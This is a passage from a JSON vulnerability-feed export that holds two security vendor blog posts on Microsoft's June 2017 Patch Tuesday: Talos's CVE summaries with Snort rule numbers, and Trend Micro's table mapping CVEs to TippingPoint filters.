Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.<br /><h4 id=\"h.wflwqpqh38w8\">CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468</h4>These are use-after-free vulnerability that can result in privilege escalation. This is specifically triggered when the Windows improperly handles objects in memory. These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.<br /><h4 id=\"h.loqaz6h61hfq\">CVE-2017-8469 / CVE-2017-8470</h4>This is an information disclosure vulnerability related to the way the Windows kernel improperly initializes objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.ahczr2jz5r7j\">CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553</h4>These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.r3dx3kkvmfcz\">CVE-2017-8493</h4>This is a security feature bypass vulnerability that exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks. This could result in an attacker being able to set variables that are either read-only or require authentication. This can be exploited by an attacker executing a specially crafted application to bypass UEFI variable security in Windows.<br /><h4 id=\"h.p3llcf1m8rq5\">CVE-2017-8494</h4>This is a privilege escalation vulnerability related to improper object handling in memory in Windows Secure Kernel Mode. This can be exploited by a locally-authenticated attacker executing a specially crafted application.<br /><h4 id=\"h.6462oxbspxq3\">CVE-2017-8507</h4>This is a remote code execution vulnerability in Microsoft Outlook related to parsing of specially crafted email messages. This vulnerability is triggered when Microsoft Outlook processes a specially crafted message that allows script execution. This can be exploited by opening a specially crafted email message.<br /><h4 id=\"h.y14yeg9hmtps\">CVE-2017-8508</h4>This is a security feature bypass vulnerability in Microsoft Office related to the improper handling of the parsing of file formats. The vulnerability by itself does not allow arbitrary code execution, but could be used in conjunction with another vulnerability to take advantage of the security feature bypass to execute arbitrary code. This can be exploited by having a user open a specially crafted file.<br /><h4 id=\"h.kqtny2lmhpy4\">CVE-2017-8509 / CVE-2017-8510 / CVE-2017-8511 / CVE-2017-8512 / CVE-2017-8513</h4>These are remote code execution in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.<br /><h4 id=\"h.o1ru3izc54qs\">CVE-2017-8514</h4>This is a reflective cross site scripting vulnerability in Microsoft SharePoint Server related to improper sanitization of specially crafted requests. This can be exploited by sending a specially crafted request to an affected SharePoint server and will run the script in the security context of the current user. The request could be delivered via both email message or through a specially crafted URL on a website.<br /><h4 id=\"h.3mlt339eyw7b\">CVE-2017-8515</h4>This is a denial of service vulnerability in Microsoft Windows that is triggered when an unauthenticated attacker sends a specially crafted kernel mode request. This attack could cause a denial of service on the target system, requiring a reboot to resolve.<br /><h4 id=\"h.z2c1qk9dh3d8\">CVE-2017-8519</h4>This is a remote code execution vulnerability in Internet Explorer related to the objects in memory are improperly accessed. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.mv8eybhqa5pd\">CVE-2017-8521</h4>This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.<br /><h4 id=\"h.5ffctj19wxm5\">CVE-2017-8523</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly apply Same Origin Policy for HTML elements present in other browser windows. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.g14jbgu5zebf\">CVE-2017-8529</h4>This is an information disclosure vulnerability that targets both Internet Explorer and Edge. The vulnerability resides specifically in print preview and can be triggered by browsing to a specially crafted URL.<br /><h4 id=\"h.e6il8xov2qu5\">CVE-2017-8530</h4>This is a security feature bypass vulnerability in Microsoft Edge related to a failure to correctly enforce Same Origin Policies potentially allowing an attacker to access information from origins outside of the current one. This vulnerability could be leveraged to trick a user into loading a page with malicious content when a user visits a specially crafted website.<br /><h4 id=\"h.yo9w4ohnsd64\">CVE-2017-8531 / CVE-2017-8532 / CVE-2017-8533</h4>These are information disclosure vulnerabilities in the Windows CDI component related to improper disclosure of the contents of its memory. They can be exploited by having a user open a specially crafted document or visit an untrusted webpage.<br /><h4 id=\"h.i2sjbys230jf\">CVE-2017-8534</h4>This is an information disclosure vulnerability in Windows Uniscribe related to the improper disclosure of the contents of its memory. There are multiple ways to exploit this vulnerability including having the user open a specially crafted document of having them visit an untrusted webpage.<br /><h4 id=\"h.1jm00kmnvkvp\">CVE-2017-8544</h4>This is an information disclosure vulnerability in Windows Search related to improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.<br /><h4 id=\"h.x5xrllpbrgrq\">CVE-2017-8545</h4>This is a spoofing vulnerability in Microsoft Office for Mac related to the improper sanitization of html or treat it in a safe manner. This can be exploited by sending an email with specific HTML tags that display a malicious authentication prompt and could provide the attacker a user's authentication information or login credentials.<br /><h4 id=\"h.vm3l0n9yt3yj\">CVE-2017-8547</h4>This is a remote code execution vulnerability in Internet Explorer related to improper access of objects in memory. The vulnerability could result in corrupt memory that can be leveraged to execute arbitrary code. Exploitation can occur by having a user view a specially crafted website.<br /><h4 id=\"h.ifsntniixnev\">CVE-2017-8550</h4>This is a remote code execution vulnerability in Skype for Business and Microsoft Lync Servers related to a failure to properly sanitize specially crafted content. An authenticated attacker could leverage this vulnerability to execute HTML and JavaScript content in the Skype for Business of Lync context including opening a web page using the default browser or opening another messaging session with another user. Exploitation would require an attacker to invite a user to an instant message session and then send a message that contains specially crafted JavaScript content.<br /><h4 id=\"h.5idaqenq3iuk\">CVE-2017-8551</h4>This is a privilege escalation vulnerability in SharePoint Server related to the improper sanitization of a specially crafted web request. Successful exploitation could result in cross-site scripting attacks on affected systems and the script running in the security context of the current user. Exploitation occurs by an authenticated attacker sending a specially crafted request to an affected SharePoint Server.<br /><h4 id=\"h.dazxtzgr79i4\">CVE-2017-8555</h4>This is a security feature bypass vulnerability in Microsoft Edge related to improper validation of specially crafted documents in the Edge Content Security Policy. This vulnerability could be leveraged to trick a user into loading a web page with malicious content. Exploitation occurs through a user viewing a specially crafted webpage.<br /><h3 id=\"h.x43pguv8bvah\">Coverage</h3>In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.<br /><br />Snort Rules:<br />17042<br />24500<br />43155-43166<br />43169-43176<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=FtF1o6PBkRM:WE1LfzY7Ugo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/FtF1o6PBkRM\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-06-13T20:50:20", "published": "2017-06-13T13:48:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/FtF1o6PBkRM/ms-tuesday.html", "id": "TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "title": "Microsoft Patch Tuesday - June 2017", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-06-27T11:16:56", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8488", "CVE-2017-8461", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8506", "CVE-2017-8464", "CVE-2017-8508", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8513", "CVE-2017-8550", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-8545", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8507", "CVE-2017-8474", "CVE-2017-8487", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-8509", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8551", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8512", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8520", "CVE-2017-8519", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8511", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-8510", "CVE-2017-8514", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8534", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "description": "\n\n\u201cWhat can you sit on, sleep on, and brush your teeth with?\u201d This was the question posed to Steve Martin\u2019s character C.D. Bales in the 1987 movie Roxanne. In a modern take of Edmond Rostand's 1897 verse play Cyrano de Bergerac, the movie centers around C.D.\u2019s attempt to win the love of a woman while navigating life with his unusually large nose. When C.D. wonders what the point of the question is, his god sister responds, \u201cThe point is that sometimes the answer is so obvious, you don't even realize it. It's as plain as the nose on your face.\u201d By the way, the answer to the question is so obvious: a chair, a bed, and a toothbrush.\n\nAt the Gartner Security and Risk Summit in Washington, D.C., held earlier this week, I heard a recurring theme across the various sessions I attended. The theme was around the fact that the discipline of patching isn\u2019t where it needs to be. As we witnessed with the recent WannaCry ransomware attack, which utilized vulnerabilities that were disclosed by The Shadow Brokers and subsequently patched by Microsoft, many organizations were still affected because they hadn\u2019t patched their systems. The general guidance given at various sessions: Patch your systems. While the answer is so obvious, it may not be practical for some organizations, especially those with thousands of systems. Our solutions can help through the use of \u201cvirtual patching.\u201d While virtual patching is a term that is now pretty common in the security world, where we stand out is when vulnerabilities haven\u2019t been patched by the vendor. If a vulnerability comes to us via the Zero Day Initiative, we will have protection for our customers ahead of a patch that\u2019s made available by the vendor. This is even more important if a vulnerability is brought to us for a solution that is no longer supported by the vendor. Interestingly enough, with this month\u2019s Microsoft Patch Tuesday, Microsoft has issued SMB patches for Windows XP, which reached its end of support deadline in April 2014. While Microsoft states that doing this is an exception and not the norm, it could create a false \u201csafety net\u201d for those who haven\u2019t upgraded their systems. The precedent that this might set in the future is an answer that isn\u2019t so obvious.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before June 13, 2017. Microsoft released patches for almost 100 new CVEs in Internet Explorer, Edge, Office, Windows, and Skype. A total of 18 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/6/13/the-june-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0173 | | No Vendor Intelligence Provided \nCVE-2017-0193 | | No Vendor Intelligence Provided \nCVE-2017-0215 | 28628 | \nCVE-2017-0216 | | No Vendor Intelligence Provided \nCVE-2017-0218 | | No Vendor Intelligence Provided \nCVE-2017-0219 | | No Vendor Intelligence Provided \nCVE-2017-0260 | | No Vendor Intelligence Provided \nCVE-2017-0282 | | No Vendor Intelligence Provided \nCVE-2017-0283 | | No Vendor Intelligence Provided \nCVE-2017-0284 | | No Vendor Intelligence Provided \nCVE-2017-0285 | | No Vendor Intelligence Provided \nCVE-2017-0286 | | No Vendor Intelligence Provided \nCVE-2017-0287 | | No Vendor Intelligence Provided \nCVE-2017-0288 | | No Vendor Intelligence Provided \nCVE-2017-0289 | | No Vendor Intelligence Provided \nCVE-2017-0291 | | No Vendor Intelligence Provided \nCVE-2017-0292 | | No Vendor Intelligence Provided \nCVE-2017-0294 | | No Vendor Intelligence Provided \nCVE-2017-0295 | | No Vendor Intelligence Provided \nCVE-2017-0296 | | Insufficient Vendor Information \nCVE-2017-0297 | | No Vendor Intelligence Provided \nCVE-2017-0298 | | No Vendor Intelligence Provided \nCVE-2017-0299 | | No Vendor Intelligence Provided \nCVE-2017-0300 | | No Vendor Intelligence Provided \nCVE-2017-8460 | | No Vendor Intelligence Provided \nCVE-2017-8461 | | No Vendor Intelligence Provided \nCVE-2017-8462 | | No Vendor Intelligence Provided \nCVE-2017-8464 | 28614 | \nCVE-2017-8465 | 28616 | \nCVE-2017-8466 | 28618 | \nCVE-2017-8468 | 28620 | \nCVE-2017-8469 | | No Vendor Intelligence Provided \nCVE-2017-8470 | | No Vendor Intelligence Provided \nCVE-2017-8471 | | No Vendor Intelligence Provided \nCVE-2017-8472 | | No Vendor Intelligence Provided \nCVE-2017-8473 | | No Vendor Intelligence Provided \nCVE-2017-8474 | | No Vendor Intelligence Provided \nCVE-2017-8475 | | No Vendor Intelligence Provided \nCVE-2017-8476 | | No Vendor Intelligence Provided \nCVE-2017-8477 | | No Vendor Intelligence Provided \nCVE-2017-8478 | | No Vendor Intelligence Provided \nCVE-2017-8479 | | No Vendor Intelligence Provided \nCVE-2017-8480 | | No Vendor Intelligence Provided \nCVE-2017-8481 | | No Vendor Intelligence Provided \nCVE-2017-8482 | | No Vendor Intelligence Provided \nCVE-2017-8483 | | No Vendor Intelligence Provided \nCVE-2017-8484 | | No Vendor Intelligence Provided \nCVE-2017-8485 | | No Vendor Intelligence Provided \nCVE-2017-8487 | | No Vendor Intelligence Provided \nCVE-2017-8488 | | No Vendor Intelligence Provided \nCVE-2017-8489 | | No Vendor Intelligence Provided \nCVE-2017-8490 | | No Vendor Intelligence Provided \nCVE-2017-8491 | | No Vendor Intelligence Provided \nCVE-2017-8492 | | No Vendor Intelligence Provided \nCVE-2017-8493 | | No Vendor Intelligence Provided \nCVE-2017-8494 | | No Vendor Intelligence Provided \nCVE-2017-8496 | 28613 | \nCVE-2017-8497 | 28615 | \nCVE-2017-8498 | | No Vendor Intelligence Provided \nCVE-2017-8499 | | No Vendor Intelligence Provided \nCVE-2017-8504 | | No Vendor Intelligence Provided \nCVE-2017-8506 | | No Vendor Intelligence Provided \nCVE-2017-8507 | | No Vendor Intelligence Provided \nCVE-2017-8508 | | No Vendor Intelligence Provided \nCVE-2017-8509 | 28619 | \nCVE-2017-8510 | 28621 | \nCVE-2017-8511 | | No Vendor Intelligence Provided \nCVE-2017-8512 | | No Vendor Intelligence Provided \nCVE-2017-8513 | | No Vendor Intelligence Provided \nCVE-2017-8514 | | No Vendor Intelligence Provided \nCVE-2017-8515 | | No Vendor Intelligence Provided \nCVE-2017-8517 | | No Vendor Intelligence Provided \nCVE-2017-8519 | | No Vendor Intelligence Provided \nCVE-2017-8520 | | No Vendor Intelligence Provided \nCVE-2017-8521 | | No Vendor Intelligence Provided \nCVE-2017-8522 | | No Vendor Intelligence Provided \nCVE-2017-8523 | | No Vendor Intelligence Provided \nCVE-2017-8524 | 28622 | \nCVE-2017-8527 | | No Vendor Intelligence Provided \nCVE-2017-8528 | | No Vendor Intelligence Provided \nCVE-2017-8529 | | Insufficient Vendor Information \nCVE-2017-8530 | | No Vendor Intelligence Provided \nCVE-2017-8531 | | No Vendor Intelligence Provided \nCVE-2017-8532 | | No Vendor Intelligence Provided \nCVE-2017-8533 | | No Vendor Intelligence Provided \nCVE-2017-8534 | | No Vendor Intelligence Provided \nCVE-2017-8543 | 28629 | \nCVE-2017-8544 | | No Vendor Intelligence Provided \nCVE-2017-8545 | | No Vendor Intelligence Provided \nCVE-2017-8547 | 28611 | \nCVE-2017-8548 | | No Vendor Intelligence Provided \nCVE-2017-8549 | | No Vendor Intelligence Provided \nCVE-2017-8550 | | No Vendor Intelligence Provided \nCVE-2017-8551 | | No Vendor Intelligence Provided \nCVE-2017-8553 | | No Vendor Intelligence Provided \nCVE-2017-8554 | | No Vendor Intelligence Provided \nCVE-2017-8555 | | No Vendor Intelligence Provided \n \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28543: ZDI-CAN-4719: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28544: ZDI-CAN-4729: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28546: ZDI-CAN-4730: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28547: ZDI-CAN-4731: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28548: ZDI-CAN-4732: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Trend Micro (5)_**\n\n| \n\n * 28536: ZDI-CAN-4652: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28537: ZDI-CAN-4653: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28538: ZDI-CAN-4659: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28541: ZDI-CAN-4664: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28542: ZDI-CAN-4671,4675: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 28608: HTTPS: HPE Network Automation RedirectServlet SQL Injection Vulnerability (ZDI-17-331)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-5-2017/>).", "modified": "2017-06-16T12:00:40", "published": "2017-06-16T12:00:40", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-12-2017/", "id": "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 12, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
